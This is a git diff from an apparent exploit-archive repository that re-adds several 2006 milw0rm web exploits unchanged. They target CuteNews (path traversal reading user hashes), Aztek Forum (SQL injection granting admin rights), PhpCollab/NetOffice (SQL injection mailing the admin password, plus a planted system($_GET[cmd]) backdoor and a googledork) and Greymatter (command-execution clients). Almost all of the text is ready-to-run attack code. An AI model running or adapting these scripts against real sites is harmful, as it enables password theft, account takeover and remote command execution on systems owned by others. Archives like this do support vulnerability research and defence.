- -'; - -function show($headeri) -{ -$host=$_POST[host]; -$path=$_POST[path]; -$port=$_POST[port]; -$proxy=$_POST[proxy]; -$command=$_POST[command]; -$ii=0; -$ji=0; -$ki=0; -$ci=0; -echo ''; -while ($ii <= strlen($headeri)-1) -{ -$datai=dechex(ord($headeri[$ii])); -if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) - { echo ""; - } - $ki=$ki+16; - echo ""; - } -if (strlen($datai)==1) {echo "";} else -{echo " ";} -$ii++; -$ji++; -} -for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) - { echo ""; - } - -for ($li=$ci*16; $li<=strlen($headeri); $li++) - { echo ""; - } - -echo "
".$headeri[$li+$ki]."
0".$datai."".$datai." ".$headeri[$li]."
"; -} - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -if ( ($host<>'')) -{ -if ($port=='') {$port=80;} -if ($path=='') {$path="example2.php";} - -if ($command=='') {$command="/..//users.db.php%00";} -$data="archive=".$command; -if ($proxy=='') - {$packet="POST ".$path." HTTP/1.1\r\n";} -else - { - $c = preg_match_all($proxy_regex,$proxy,$is_proxy); - if ($c==0) { - echo 'check the proxy...
'; - die; - } - else - {$packet="POST http://".$host.$path." HTTP/1.1\r\n";} - } - -$packet.="Accept: */*\r\n"; -$packet.="Referer: http://".$host.$path."\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Hamid/2006\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Keep-Alive\r\n"; -$packet.="Cache-Control: no-cache\r\n\r\n"; -$packet.=$data; - -echo '
Sending exploit to '.$host.'
'; - -if ($proxy=='') - {$fp=fsockopen(gethostbyname($host),$port);} - else - {$parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $fp=fsockopen($parts[0],$parts[1]); - if (!$fp) { echo 'No response from proxy...'; - die; - } - - } -echo $packet ; -show($packet); -fputs($fp,$packet); - -if ($proxy=='') -{ $data=''; - while (!feof($fp)) - { - $data.=fgets($fp); - } -} -else -{ -$data=''; - while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) - { - $data.=fread($fp,1); - } - -} -fclose($fp); -if (eregi('HTTP/1.1 200 OK',$data)) - {echo 'Exploit sent...
If CuteNews 1.4.1 is unpatched and vulnerable
'; - echo 'you will see '.htmlentities($command).' output inside HTML...

'; - } -else - {echo 'Error, see output...';} - -//show($data); //debug: show output in a packet dump... -//echo nl2br(htmlentities($data)); -echo $data; -} -?> - -# milw0rm.com [2006-03-26] +CuteNews 1.4.1 user Hash password Finder + + + +

CuteNews 1.4.1 (and Below) user Hash password Finder

+

Security ? .

+

Bug Discovered and Exploited by Hamid Ebadi .: Hamid Network Security Team :.

+

Happy Norouz ( PERSIAN new year celebration ) Greetz to all Iranian Hackers spacially my friends in ihsteam.com c0d3r.org kapda.ir simorgh-ev.com hat-squad.com blacknews.ws ashiyane.com websecurity.ir crouz.com shabgard.org hackerz.ir and ...

+ + + +

read this paper about CuteNews 1.4.1 vulnerability

+ + + + +
+
+

+ + hostname (ex: www.sitename.com)

+

+ + path (ex: /cutenews/example2.php )

+

+ + specify a port other than 80 (default value)

+

+ + send exploit through an HTTP proxy (ip:port)

+

+ + specify a file other than /../users.db.php%00 to read

+

+ +

+

Spacial THX : rgod at http://rgod.altervista.org for his great codes (i just change few lines of RGOD old NETQUERY remote commands execution exploit)

+
+ +'; + +function show($headeri) +{ +$host=$_POST[host]; +$path=$_POST[path]; +$port=$_POST[port]; +$proxy=$_POST[proxy]; +$command=$_POST[command]; +$ii=0; +$ji=0; +$ki=0; +$ci=0; +echo ''; +while ($ii <= strlen($headeri)-1) +{ +$datai=dechex(ord($headeri[$ii])); +if ($ji==16) { + $ji=0; + $ci++; + echo ""; + for ($li=0; $li<=15; $li++) + { echo ""; + } + $ki=$ki+16; + echo ""; + } +if (strlen($datai)==1) {echo "";} else +{echo " ";} +$ii++; +$ji++; +} +for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) + { echo ""; + } + +for ($li=$ci*16; $li<=strlen($headeri); $li++) + { echo ""; + } + +echo "
".$headeri[$li+$ki]."
0".$datai."".$datai." ".$headeri[$li]."
"; +} + +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; + +if ( ($host<>'')) +{ +if ($port=='') {$port=80;} +if ($path=='') {$path="example2.php";} + +if ($command=='') {$command="/..//users.db.php%00";} +$data="archive=".$command; +if ($proxy=='') + {$packet="POST ".$path." HTTP/1.1\r\n";} +else + { + $c = preg_match_all($proxy_regex,$proxy,$is_proxy); + if ($c==0) { + echo 'check the proxy...
'; + die; + } + else + {$packet="POST http://".$host.$path." HTTP/1.1\r\n";} + } + +$packet.="Accept: */*\r\n"; +$packet.="Referer: http://".$host.$path."\r\n"; +$packet.="Accept-Language: it\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Hamid/2006\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Keep-Alive\r\n"; +$packet.="Cache-Control: no-cache\r\n\r\n"; +$packet.=$data; + +echo '
Sending exploit to '.$host.'
'; + +if ($proxy=='') + {$fp=fsockopen(gethostbyname($host),$port);} + else + {$parts=explode(':',$proxy); + echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; + $fp=fsockopen($parts[0],$parts[1]); + if (!$fp) { echo 'No response from proxy...'; + die; + } + + } +echo $packet ; +show($packet); +fputs($fp,$packet); + +if ($proxy=='') +{ $data=''; + while (!feof($fp)) + { + $data.=fgets($fp); + } +} +else +{ +$data=''; + while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) + { + $data.=fread($fp,1); + } + +} +fclose($fp); +if (eregi('HTTP/1.1 200 OK',$data)) + {echo 'Exploit sent...
If CuteNews 1.4.1 is unpatched and vulnerable
'; + echo 'you will see '.htmlentities($command).' output inside HTML...

'; + } +else + {echo 'Error, see output...';} + +//show($data); //debug: show output in a packet dump... +//echo nl2br(htmlentities($data)); +echo $data; +} +?> + +# milw0rm.com [2006-03-26] diff --git a/platforms/php/webapps/1616.pl b/platforms/php/webapps/1616.pl index fd20e6d54..8946e3ae4 100755 --- a/platforms/php/webapps/1616.pl +++ b/platforms/php/webapps/1616.pl 
@@ -1,116 +1,116 @@ -#!/usr/bin/perl -use IO::Socket; -# Aztek Forum 4.00 Change User Rights Remote Exploit -# -# only if the magic_quote are : OFF <<<<<<<<<<<<<<<<<<<<<< -# -# Hum hum , sorry for my bad english i'm french ;) -# Note : Before using this exploit you must create a count on the board :) -# And this count will receive the administrator -# rights ! -# aztek_gar.pl -# aztek_gar.pl 127.0.0.1 /aztek/ Admin Attacker -# -# -#+------------------------------------------------------------+ -#- Aztek 4.0 Give Admin rights to a normal user - -#- -# - -#- coded by _Sparah_ - -#+-----------------------------------------------------------+ -# -# [~] Connection to 127.0.0.1 on port 80 ... -# -# [+] CoOkie : ATK_ADMIN=6688f12bf61a432c22e38c46a194e6ea -# -# [!] D0ne ! - -# var -$host = $ARGV[0]; -$path = $ARGV[1]; -$owner = $ARGV[2]; -$user = $ARGV[3]; - -#banner -if (@ARGV<4) { -print q( - -+--------+ -| banner | -+---------------------------------------------+ -|Aztek 4.0 Give Admin Rights to a normal user | -| | -| by _Sparah_ | -+---------------------------------------------+ - -=[X]=- -+---------------------------------------------+ -| http://www.eos-team.be/ | -| http://sparah.next-touch.com/ (soon) | -+---------------------------------------------+ - -=[X]=- -+---------------------------------------------+ -| Usage : | -| | -| *.pl | -| ex : 127.0.0.1 /aztek/ Admin Attacker | -| | -+---------------------------------------------+ - | E.o.S| - +------+ - -);exit();} - -print " - -+----------------------------------------------+ -- Aztek 4.0 Give Admin rights to a normal user - -- - -- coded by _Sparah_ - -+----------------------------------------------+ - -"; - -print "\n[~] Connection to $host on port 80 ...\n"; - -#1st request -$req1= "login=".$owner."%27%23&passwd="; -$len1= length $req1; - -$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort -=> "80") || die "\n[-] Connection failed..."; -print $send "POST 
".$path."myadmin.php?action=login HTTP/1.1\n"; -print $send "Host: $host\n"; -print $send "Cookie: ATK_PASSWD=; ATK_LOGIN=nobody; ATK_SESS=\n"; -print $send "Content-Type: application/x-www-form-urlencoded\n"; -print $send "Content-Length: ".$len1."\n\n"; -print $send "".$req1."\n"; - -# take cookie value -while(chomp($cookie=<$send>)) -{ - if ($cookie =~ /Set\-Cookie\: (\S+)/) - { - $ATK=$1; - close($send); - } -} - -print "\n[+] CoOkie : ".$ATK."\n"; - -# 2nd request -$req2 = -"login=".$user."&priv%5B%5D=0&priv%5B%5D=1&priv%5B%5D=4&priv%5B%5D=2&priv%5B%5D=3&priv%5B%5D=5"; -$len2 = length $req2; -$data = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort -=> "80") || die "\n[-] Connection failed..."; -print $data "POST ".$path."myadmin.php?action=admin&choix=6 HTTP/1.1\n"; -print $data "Host: ".$host."\n"; -print $data "Cookie: ".$ATK."\n"; -print $data "Content-Type: application/x-www-form-urlencoded\n"; -print $data "Content-Length: ".$len2."\n\n"; -print $data "".$req2."\n"; -read $data,$res,9000; -print $res; -print "\n[!] D0ne !\n\n"; - -# milw0rm.com [2006-03-26] +#!/usr/bin/perl +use IO::Socket; +# Aztek Forum 4.00 Change User Rights Remote Exploit +# +# only if the magic_quote are : OFF <<<<<<<<<<<<<<<<<<<<<< +# +# Hum hum , sorry for my bad english i'm french ;) +# Note : Before using this exploit you must create a count on the board :) +# And this count will receive the administrator +# rights ! +# aztek_gar.pl +# aztek_gar.pl 127.0.0.1 /aztek/ Admin Attacker +# +# +#+------------------------------------------------------------+ +#- Aztek 4.0 Give Admin rights to a normal user - +#- +# - +#- coded by _Sparah_ - +#+-----------------------------------------------------------+ +# +# [~] Connection to 127.0.0.1 on port 80 ... +# +# [+] CoOkie : ATK_ADMIN=6688f12bf61a432c22e38c46a194e6ea +# +# [!] D0ne ! 
+ +# var +$host = $ARGV[0]; +$path = $ARGV[1]; +$owner = $ARGV[2]; +$user = $ARGV[3]; + +#banner +if (@ARGV<4) { +print q( + ++--------+ +| banner | ++---------------------------------------------+ +|Aztek 4.0 Give Admin Rights to a normal user | +| | +| by _Sparah_ | ++---------------------------------------------+ + -=[X]=- ++---------------------------------------------+ +| http://www.eos-team.be/ | +| http://sparah.next-touch.com/ (soon) | ++---------------------------------------------+ + -=[X]=- ++---------------------------------------------+ +| Usage : | +| | +| *.pl | +| ex : 127.0.0.1 /aztek/ Admin Attacker | +| | ++---------------------------------------------+ + | E.o.S| + +------+ + +);exit();} + +print " + ++----------------------------------------------+ +- Aztek 4.0 Give Admin rights to a normal user - +- - +- coded by _Sparah_ - ++----------------------------------------------+ + +"; + +print "\n[~] Connection to $host on port 80 ...\n"; + +#1st request +$req1= "login=".$owner."%27%23&passwd="; +$len1= length $req1; + +$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort +=> "80") || die "\n[-] Connection failed..."; +print $send "POST ".$path."myadmin.php?action=login HTTP/1.1\n"; +print $send "Host: $host\n"; +print $send "Cookie: ATK_PASSWD=; ATK_LOGIN=nobody; ATK_SESS=\n"; +print $send "Content-Type: application/x-www-form-urlencoded\n"; +print $send "Content-Length: ".$len1."\n\n"; +print $send "".$req1."\n"; + +# take cookie value +while(chomp($cookie=<$send>)) +{ + if ($cookie =~ /Set\-Cookie\: (\S+)/) + { + $ATK=$1; + close($send); + } +} + +print "\n[+] CoOkie : ".$ATK."\n"; + +# 2nd request +$req2 = +"login=".$user."&priv%5B%5D=0&priv%5B%5D=1&priv%5B%5D=4&priv%5B%5D=2&priv%5B%5D=3&priv%5B%5D=5"; +$len2 = length $req2; +$data = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort +=> "80") || die "\n[-] Connection failed..."; +print $data "POST ".$path."myadmin.php?action=admin&choix=6 HTTP/1.1\n"; 
+print $data "Host: ".$host."\n"; +print $data "Cookie: ".$ATK."\n"; +print $data "Content-Type: application/x-www-form-urlencoded\n"; +print $data "Content-Length: ".$len2."\n\n"; +print $data "".$req2."\n"; +read $data,$res,9000; +print $res; +print "\n[!] D0ne !\n\n"; + +# milw0rm.com [2006-03-26] diff --git a/platforms/php/webapps/1617.php b/platforms/php/webapps/1617.php index 24cb384a3..c249db3f3 100755 --- a/platforms/php/webapps/1617.php +++ b/platforms/php/webapps/1617.php 
@@ -1,173 +1,173 @@ -#!/usr/bin/php -q -d short_open_tag=on - works with magic_quotes_gpc = Off\r\n\r\n"; -echo "a googledork: intitle:phpcollab|netoffice \"index of\" -www-apps -php-collab.org -ext:xml\r\n\r\n"; -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path email OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to NetOffice or PHPCollab\r\n"; -echo "email: your email\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /NetOffice/ youremail@somehost.com\n"; -echo "php ".$argv[0]." localhost /PhpCollab/ youremail@somehost.com -p81\r\n"; -echo "php ".$argv[0]." localhost / youremail@somehost.com -P1.1.1.1:80\r\n"; -die; -} - -/* explaination: - - tested & working against: PhpCollab v2.4 - PhpCollab v2.5 rc3 - NetOffice v2.5.3-pl1 - NetOffice v2.6.0b2 - vulnerability; - - SQL injection in "forgotten password" feature: - if magic_quotes_gpc=Off you can send yourself the admin (md5(), crypt() or - plain text) password, poc: - you can submit a "loginForm" POST value like this to general/sendpassword.php - script : - - 'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5(), - crypt() or in plain text): ',password),password,name,title,'[your email here]' - ,null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php','','' - ,null FROM members mem WHERE id=1/* - - query becomes: - SELECT mem.*, org.name, log.connected FROM members mem LEFT OUTER JOIN - organizations org ON org.id = mem.organization LEFT OUTER JOIN logs log ON - log.login = mem.login WHERE mem.login = ''UNION SELECT id,1,CONCAT('this is - the real password (encrypted with md5(),crypt() or in plain text): ',password - ),password,name,title,'[your email]',null,'','','','',null,1,'2006-03-27 20: - 48',0,'administration/admin.php','','',null FROM members mem WHERE id=1/*' - - you will receive soon a mail like 
this: - - Username : this is the real password (encrypted with md5(),crypt() or in plain text): [password] - password : [random generated password] - - ignore password field, password is not changed, 'cause the UPDATE query fails, - but the real one is showed in Username mail field. - - once you are admin, you can inject arbitrary code in settings.php - (you know, magic_quotes_gpc is off), poc: - login, go to "Edit settings" feature, in FTP SERVER field type: - - '); system($_GET[cmd]); print (' - - in settings.php, near line 38, you have: - - ... - define('FTPSERVER',''); system($_GET[cmd]); print (''); - ... - - so you can launch commands, ex: - - http://[target]/[path]/general/login.php?cmd=ls%20-la - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$your_email=""; -$port=80; -$proxy=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$your_email.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} - -$sql ="'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5()"; -$sql.=",crypt() or in plain text): ',password),password,name,title,'".$your_email; -$sql.="',null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php',"; -$sql.="'','',null FROM members mem WHERE id=1/*"; -$sql=urlencode($sql); -$data="loginForm=".$sql; -$packet ="POST ".$p."general/sendpassword.php?action=send HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -echo quick_dump($packet); -sendpacketii($packet); -echo "Now check your mailbox..."; -?> - -# milw0rm.com [2006-03-28] +#!/usr/bin/php -q -d short_open_tag=on + works with magic_quotes_gpc = Off\r\n\r\n"; +echo "a googledork: intitle:phpcollab|netoffice \"index of\" -www-apps -php-collab.org -ext:xml\r\n\r\n"; +if ($argc<4) { +echo "Usage: php ".$argv[0]." 
host path email OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to NetOffice or PHPCollab\r\n"; +echo "email: your email\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /NetOffice/ youremail@somehost.com\n"; +echo "php ".$argv[0]." localhost /PhpCollab/ youremail@somehost.com -p81\r\n"; +echo "php ".$argv[0]." localhost / youremail@somehost.com -P1.1.1.1:80\r\n"; +die; +} + +/* explaination: + + tested & working against: PhpCollab v2.4 + PhpCollab v2.5 rc3 + NetOffice v2.5.3-pl1 + NetOffice v2.6.0b2 + vulnerability; + + SQL injection in "forgotten password" feature: + if magic_quotes_gpc=Off you can send yourself the admin (md5(), crypt() or + plain text) password, poc: + you can submit a "loginForm" POST value like this to general/sendpassword.php + script : + + 'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5(), + crypt() or in plain text): ',password),password,name,title,'[your email here]' + ,null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php','','' + ,null FROM members mem WHERE id=1/* + + query becomes: + SELECT mem.*, org.name, log.connected FROM members mem LEFT OUTER JOIN + organizations org ON org.id = mem.organization LEFT OUTER JOIN logs log ON + log.login = mem.login WHERE mem.login = ''UNION SELECT id,1,CONCAT('this is + the real password (encrypted with md5(),crypt() or in plain text): ',password + ),password,name,title,'[your email]',null,'','','','',null,1,'2006-03-27 20: + 48',0,'administration/admin.php','','',null FROM members mem WHERE id=1/*' + + you will receive soon a mail like this: + + Username : this is the real password (encrypted with md5(),crypt() or in plain text): [password] + password : [random generated password] + + ignore password field, password is not changed, 'cause the UPDATE query fails, + but the real one is showed in 
Username mail field. + + once you are admin, you can inject arbitrary code in settings.php + (you know, magic_quotes_gpc is off), poc: + login, go to "Edit settings" feature, in FTP SERVER field type: + + '); system($_GET[cmd]); print (' + + in settings.php, near line 38, you have: + + ... + define('FTPSERVER',''); system($_GET[cmd]); print (''); + ... + + so you can launch commands, ex: + + http://[target]/[path]/general/login.php?cmd=ls%20-la + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$your_email=""; +$port=80; +$proxy=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$your_email.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} + +$sql ="'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5()"; +$sql.=",crypt() or in plain text): ',password),password,name,title,'".$your_email; +$sql.="',null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php',"; +$sql.="'','',null FROM members mem WHERE id=1/*"; +$sql=urlencode($sql); +$data="loginForm=".$sql; +$packet ="POST ".$p."general/sendpassword.php?action=send HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +echo quick_dump($packet); +sendpacketii($packet); +echo "Now check your mailbox..."; +?> + +# milw0rm.com [2006-03-28] diff --git a/platforms/php/webapps/1618.c b/platforms/php/webapps/1618.c index b92a1f098..bf21484a0 100755 --- a/platforms/php/webapps/1618.c +++ b/platforms/php/webapps/1618.c 
@@ -1,99 +1,99 @@ -#include -#include -#include -#define RETCONNERR 4 // Connection error -#define RETSOCKERR 3 // Return for socket error -#define RETRESVERR 2 // Error code for cannot resolve host -#define RETOK 1 // Return OK -#pragma comment(lib,"wsock32") -#define portnum 80 -int info(char *ls1); -int ConnectWithString(char *hostname,char *string); -int main(int argc,char **argv){ - char buff[512]=""; - char get[1024]=""; - if(argc<3) - { - info(argv[0]); - return 0; - } - strcpy(buff,argv[2]); - strcat(buff,"?cmd="); - strcat(buff,argv[3]); - strcpy(get,"GET "); - strcat(get,buff); - strcat(get," HTTP/1.1"); - printf("%s\n",get); - ConnectWithString(argv[1],get); - return 0; -} -int ConnectWithString(char *hostname,char *string) -{ - // Socket handle - WSADATA wsda; - - // Socket file descriptor - int sockfd; - - // host entrie - struct hostent *h; - - // Server struct - struct sockaddr_in server; - - // Return value - int ret; - - // Initialize socket - WSAStartup(0x0101, &wsda); - - // Open a socket - // Create tcp socket - if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) - return RETSOCKERR; - - // Cannot create socket if anything fails - else - return RETSOCKERR; - - // Resolve host - if((h=gethostbyname(hostname)) == NULL) - return RETRESVERR; - - // Init server struct - server.sin_addr=*((struct in_addr*)h->h_addr); - server.sin_port=htons(portnum); - server.sin_family=AF_INET; - - // Connect with server - if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr)) == -1) - return RETCONNERR; - - // Send string - ret = send(sockfd, string, strlen(string), 0); - - // Check for socket error - if(ret == SOCKET_ERROR) - return RETSOCKERR; - - // Cleanup socket - WSACleanup(); - - closesocket(sockfd); - - // Everything OK - - return RETOK; -} -int info(char *ls1){ - printf("******************************************************************\n"); - printf("* GREYMATTER Exploit private version *\n"); - printf("* Exploit By:No_Face_King Bug 
By:syst3m_f4ult *\n"); - printf("* www.crouz.com Great iranian security team *\n"); - printf("* Usage: %s VictimIP GREYMATTER Path command *\n",ls1); - printf("* e.g: %s 192.168.0.1 /00000008.php uname -a *\n",ls1); - printf("******************************************************************\n"); - return 0; -} - -// milw0rm.com [2006-03-28] +#include +#include +#include +#define RETCONNERR 4 // Connection error +#define RETSOCKERR 3 // Return for socket error +#define RETRESVERR 2 // Error code for cannot resolve host +#define RETOK 1 // Return OK +#pragma comment(lib,"wsock32") +#define portnum 80 +int info(char *ls1); +int ConnectWithString(char *hostname,char *string); +int main(int argc,char **argv){ + char buff[512]=""; + char get[1024]=""; + if(argc<3) + { + info(argv[0]); + return 0; + } + strcpy(buff,argv[2]); + strcat(buff,"?cmd="); + strcat(buff,argv[3]); + strcpy(get,"GET "); + strcat(get,buff); + strcat(get," HTTP/1.1"); + printf("%s\n",get); + ConnectWithString(argv[1],get); + return 0; +} +int ConnectWithString(char *hostname,char *string) +{ + // Socket handle + WSADATA wsda; + + // Socket file descriptor + int sockfd; + + // host entrie + struct hostent *h; + + // Server struct + struct sockaddr_in server; + + // Return value + int ret; + + // Initialize socket + WSAStartup(0x0101, &wsda); + + // Open a socket + // Create tcp socket + if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) + return RETSOCKERR; + + // Cannot create socket if anything fails + else + return RETSOCKERR; + + // Resolve host + if((h=gethostbyname(hostname)) == NULL) + return RETRESVERR; + + // Init server struct + server.sin_addr=*((struct in_addr*)h->h_addr); + server.sin_port=htons(portnum); + server.sin_family=AF_INET; + + // Connect with server + if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr)) == -1) + return RETCONNERR; + + // Send string + ret = send(sockfd, string, strlen(string), 0); + + // Check for socket error + if(ret == SOCKET_ERROR) + return 
RETSOCKERR; + + // Cleanup socket + WSACleanup(); + + closesocket(sockfd); + + // Everything OK + + return RETOK; +} +int info(char *ls1){ + printf("******************************************************************\n"); + printf("* GREYMATTER Exploit private version *\n"); + printf("* Exploit By:No_Face_King Bug By:syst3m_f4ult *\n"); + printf("* www.crouz.com Great iranian security team *\n"); + printf("* Usage: %s VictimIP GREYMATTER Path command *\n",ls1); + printf("* e.g: %s 192.168.0.1 /00000008.php uname -a *\n",ls1); + printf("******************************************************************\n"); + return 0; +} + +// milw0rm.com [2006-03-28] diff --git a/platforms/php/webapps/1619.pl b/platforms/php/webapps/1619.pl index 02cbbaac5..64bbf1d27 100755 --- a/platforms/php/webapps/1619.pl +++ b/platforms/php/webapps/1619.pl 
@@ -1,46 +1,46 @@ -#!/usr/bin/perl -# -# Exploit by Hessam-x (www.hessamx.net) -# Special Thanx : Vampire , s3rv3r_hack3r -###################################################### -# ___ ___ __ # -# / | \_____ ____ | | __ ___________________ # -#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # -#\ Y // __ \\ \___| <\ ___/| | \// / # -# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ # -# \/ \/ \/ \/ \/ \/ # -# Iran Hackerz Security Team # -# WebSite: www.hackerz.ir # -# DeltaHAcking Team # -# website: www.deltahacking.com # -###################################################### -# Name : Greymatter # -# Site : http://www.noahgrey.com/greysoft/ # -###################################################### -# example: -# target : www.yesite.com/Greymatter/ -# archive number : 00000141 -use LWP::Simple; - - -print "-------------------------------------------\n"; -print "= Greymatter =\n"; -print "= By Hessam-x - www.hackerz.ir =\n"; -print "= Vampire - www.deltahacking.com =\n"; -print "-------------------------------------------\n\n"; - - - print "Target >http://"; - chomp($targ = ); - print "archive number >"; - chomp($arnum= ); - - $con=get("http://".$targ) || die "[-]Cannot connect to Host"; -while () -{ - print "Hessam-x@Greymatter \$"; - chomp($comd=); - $commd=get("http://".$targ."archives/".$arnum.".php?cmd=".comd) -} - -# milw0rm.com [2006-03-28] +#!/usr/bin/perl +# +# Exploit by Hessam-x (www.hessamx.net) +# Special Thanx : Vampire , s3rv3r_hack3r +###################################################### +# ___ ___ __ # +# / | \_____ ____ | | __ ___________________ # +#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / # +#\ Y // __ \\ \___| 